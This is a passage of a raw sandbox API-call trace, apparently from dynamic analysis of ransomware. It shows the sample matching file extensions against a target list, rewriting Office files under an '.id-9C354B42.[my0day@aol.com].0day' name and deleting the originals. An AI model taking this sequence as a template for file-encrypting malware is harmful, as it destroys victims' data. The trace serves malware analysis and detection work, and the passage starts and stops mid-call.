lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.545] lstrlenW (lpString=".zip") returned 4 [0036.545] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.545] lstrlenW (lpString=".rar") returned 4 [0036.545] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.545] lstrlenW (lpString=".bz2") returned 4 [0036.545] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.546] lstrlenW (lpString=".7z") returned 3 [0036.546] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.546] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.546] lstrlenW (lpString=".dbf") returned 4 [0036.546] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.546] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.546] lstrlenW (lpString=".1cd") returned 4 [0036.546] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.546] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0036.546] lstrlenW (lpString=".jpg") returned 4 [0036.546] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.546] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0036.546] lstrlenW (lpString="join.avi") returned 8 [0036.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.173] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=222208) returned 1 [0037.174] CloseHandle (hObject=0x170) returned 1 [0037.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0037.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.174] lstrlenW (lpString=".doc") returned 4 [0037.174] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString=".docx") returned 5 [0037.174] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0037.174] lstrlenW (lpString=".pdf") returned 4 [0037.174] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString=".xls") returned 4 [0037.174] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString=".xlsx") returned 5 [0037.174] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0037.174] lstrlenW (lpString=".ppt") returned 4 [0037.174] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.174] lstrlenW (lpString=".zip") returned 4 [0037.174] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString=".rar") returned 4 [0037.174] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString=".bz2") returned 4 [0037.174] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.174] lstrlenW (lpString=".7z") returned 3 [0037.175] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.175] lstrlenW (lpString=".dbf") returned 4 [0037.175] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.175] lstrlenW (lpString=".1cd") returned 4 [0037.175] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.175] lstrlenW (lpString=".jpg") returned 4 [0037.175] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.175] lstrlenW (lpString=".doc") returned 4 [0037.175] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString=".docx") returned 5 [0037.175] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0037.175] lstrlenW (lpString=".pdf") returned 4 [0037.175] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString=".xls") returned 4 [0037.175] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString=".xlsx") returned 5 [0037.175] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0037.175] lstrlenW (lpString=".ppt") returned 4 [0037.175] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.175] lstrlenW (lpString=".zip") returned 4 [0037.175] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString=".rar") returned 4 [0037.175] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString=".bz2") returned 4 [0037.175] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.175] lstrlenW (lpString=".7z") returned 3 [0037.176] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.176] lstrlenW (lpString=".dbf") returned 4 [0037.176] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.176] lstrlenW (lpString=".1cd") returned 4 [0037.176] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0037.176] lstrlenW (lpString=".jpg") returned 4 [0037.176] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.176] lstrcmpiW (lpString1=".HTM", lpString2=".0day") returned 1 [0037.176] lstrlenW (lpString="README.HTM") returned 10 [0037.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0037.729] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1941) returned 1 [0037.729] CloseHandle (hObject=0x1d8) returned 1 [0037.729] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 0x20 [0037.729] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0037.729] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.729] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0037.730] GetLastError () returned 0x0 [0037.730] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x795, lpOverlapped=0x0) returned 1 [0037.857] WriteFile (in: hFile=0x1dc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7a0, lpOverlapped=0x0) returned 1 [0037.858] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.858] WriteFile (in: hFile=0x1dc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0037.858] SetEndOfFile (hFile=0x1dc) returned 1 [0037.858] CloseHandle (hObject=0x1dc) returned 1 [0037.859] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.859] SetEndOfFile (hFile=0x1d8) returned 1 [0037.860] CloseHandle (hObject=0x1d8) returned 1 [0037.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0037.860] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.861] lstrlenW (lpString=".doc") returned 4 [0037.861] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0037.861] lstrlenW (lpString=".docx") returned 5 [0037.861] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0037.861] lstrlenW (lpString=".pdf") returned 4 [0037.861] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0037.861] lstrlenW (lpString=".xls") returned 4 [0037.861] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0037.861] lstrlenW (lpString=".xlsx") returned 5 [0037.861] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0037.861] lstrlenW (lpString=".ppt") returned 4 [0037.861] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.861] lstrlenW (lpString=".zip") returned 4 [0037.861] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0037.861] lstrlenW (lpString=".rar") returned 4 [0037.861] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0037.861] lstrlenW (lpString=".bz2") returned 4 [0037.861] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0037.861] lstrlenW (lpString=".7z") returned 3 [0037.861] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.861] lstrlenW (lpString=".dbf") returned 4 [0037.861] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.861] lstrlenW (lpString=".1cd") returned 4 [0037.861] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.861] lstrlenW (lpString=".jpg") returned 4 [0037.861] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0037.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.862] lstrlenW (lpString=".doc") returned 4 [0037.862] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0037.862] lstrlenW (lpString=".docx") returned 5 [0037.862] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0037.862] lstrlenW (lpString=".pdf") returned 4 [0037.862] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0037.862] lstrlenW (lpString=".xls") returned 4 [0037.862] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0037.862] lstrlenW (lpString=".xlsx") returned 5 [0037.862] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0037.862] lstrlenW (lpString=".ppt") returned 4 [0037.862] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0037.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.862] lstrlenW (lpString=".zip") returned 4 [0037.862] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0037.862] lstrlenW (lpString=".rar") returned 4 [0037.862] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0037.862] lstrlenW (lpString=".bz2") returned 4 [0037.862] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0037.862] lstrlenW (lpString=".7z") returned 3 [0037.862] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0037.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.862] lstrlenW (lpString=".dbf") returned 4 [0037.862] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0037.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.862] lstrlenW (lpString=".1cd") returned 4 [0037.862] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0037.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0037.862] lstrlenW (lpString=".jpg") returned 4 [0037.862] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0037.863] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0037.863] lstrlenW (lpString="SETUP.XML") returned 9 [0037.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.997] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1452) returned 1 [0038.997] CloseHandle (hObject=0x1a0) returned 1 [0038.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 0x20 [0038.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0038.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.998] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.998] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.998] GetLastError () returned 0x0 [0038.998] ReadFile (in: hFile=0x1a0, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0039.134] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0039.135] ReadFile (in: hFile=0x1a0, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.135] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.135] SetEndOfFile (hFile=0x1d8) returned 1 [0039.135] CloseHandle (hObject=0x1d8) returned 1 [0039.135] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.135] SetEndOfFile (hFile=0x1a0) returned 1 [0039.136] CloseHandle (hObject=0x1a0) returned 1 [0039.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.136] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1 [0039.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.137] lstrlenW (lpString=".doc") returned 4 [0039.137] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString=".docx") returned 5 [0039.137] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.137] lstrlenW (lpString=".pdf") returned 4 [0039.137] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString=".xls") returned 4 [0039.137] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString=".xlsx") returned 5 [0039.137] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.137] lstrlenW (lpString=".ppt") returned 4 [0039.137] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.137] lstrlenW (lpString=".zip") returned 4 [0039.137] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.137] lstrlenW (lpString=".rar") returned 4 [0039.137] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString=".bz2") returned 4 [0039.137] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString=".7z") returned 3 [0039.137] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.137] lstrlenW (lpString=".dbf") returned 4 [0039.137] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.137] lstrlenW (lpString=".1cd") returned 4 [0039.137] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.137] lstrlenW (lpString=".jpg") returned 4 [0039.138] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.138] lstrlenW (lpString=".doc") returned 4 [0039.138] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString=".docx") returned 5 [0039.138] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.138] lstrlenW (lpString=".pdf") returned 4 [0039.138] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString=".xls") returned 4 [0039.138] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString=".xlsx") returned 5 [0039.138] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.138] lstrlenW (lpString=".ppt") returned 4 [0039.138] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.138] lstrlenW (lpString=".zip") returned 4 [0039.138] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.138] lstrlenW (lpString=".rar") returned 4 [0039.138] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString=".bz2") returned 4 [0039.138] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString=".7z") returned 3 [0039.138] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.138] lstrlenW (lpString=".dbf") returned 4 [0039.138] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.138] lstrlenW (lpString=".1cd") returned 4 [0039.138] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0039.138] lstrlenW (lpString=".jpg") returned 4 [0039.138] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.139] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0039.139] lstrlenW (lpString="SETUP.XML") returned 9 [0039.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0039.528] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=9352) returned 1 [0039.528] CloseHandle (hObject=0x1f8) returned 1 [0039.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 0x20 [0039.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 